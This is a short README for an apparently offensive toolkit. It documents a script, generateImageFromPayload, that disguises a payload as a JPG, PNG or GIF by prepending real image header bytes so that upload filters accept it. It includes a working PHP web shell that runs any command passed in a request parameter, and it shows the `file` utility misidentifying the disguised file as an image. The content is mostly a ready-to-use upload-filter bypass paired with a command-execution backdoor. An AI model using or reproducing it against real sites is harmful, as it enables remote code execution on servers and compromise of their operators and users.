You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
 
 
 
 
 
 

36 lines
1.1 KiB

# Scripts for payload generation
## generateImageFromPayload
This script is designed to disguise a payload as an image. It does this by adding the first 20 bytes of a real image to the beginning of the file and adding a file extension. This will fool most filters that, for example, might only allow images to be uploaded.
To use it, you will need to have a payload ready to use. It could be anything, here is a simple php script named payload.php
```php
<?php
if( isset( $_REQUEST['jh'] ) ):
system( $_REQUEST['jh'] );
endif;
```
If I run `generateImageFromPayload payload.php`, the script will create a file called `payload.php.jpg`.
```
.
├── payload.php
└── payload.php.jpg
```
After running `file` on both, you will see that it incorrectly identifies the second as an image.
```sh
file payload.php*
payload.php: PHP script, ASCII text
payload.php.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16
```
The script will, by default, generate a jpg although you can specify png or gif by adding a second argument, e.g.
```
generateImageFromPayload payload.php png
```